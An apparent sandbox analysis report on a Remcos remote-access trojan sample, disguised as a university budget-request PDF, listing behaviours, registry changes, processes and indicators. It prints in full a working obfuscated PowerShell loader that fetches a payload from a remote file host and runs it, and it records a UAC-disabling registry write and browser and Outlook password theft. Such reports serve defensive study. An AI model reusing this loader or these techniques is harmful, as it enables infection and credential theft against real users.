Malware Analysis Report

2024-12-01 03:06

Sample ID 241111-h4t6jsvkbv
Target 11112024_0717_PERMINTAAN ANGGARAN (Universitas IPB) ID177888_pdf.vbs.zip
SHA256 d7ea8908f53391d47f6ecf1e6bb8b30d03b0abb4c77f688d03920ceeeda66812
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

d7ea8908f53391d47f6ecf1e6bb8b30d03b0abb4c77f688d03920ceeeda66812

Threat Level: Known bad

The file 11112024_0717_PERMINTAAN ANGGARAN (Universitas IPB) ID177888_pdf.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Remcos family

Remcos

UAC bypass

NirSoft MailPassView

NirSoft WebBrowserPassView

Detected Nirsoft tools

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Enumerates system info in registry

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win7-20240708-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. 
Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur 
NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC 
oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabB260.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/872-20-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

memory/872-21-0x000000001B800000-0x000000001BAE2000-memory.dmp

memory/872-22-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-25-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-24-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-23-0x0000000000680000-0x0000000000688000-memory.dmp

memory/872-26-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-27-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-28-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

memory/872-29-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-30-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-31-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-32-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-33-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win10v2004-20241007-en

Max time kernel

297s

Max time network

280s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2024 set thread context of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 set thread context of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 set thread context of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1052 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1332 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1332 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1332 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 1332 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1332 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1332 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2024 wrote to memory of 1868 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2024 wrote to memory of 1868 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 4236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 4236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
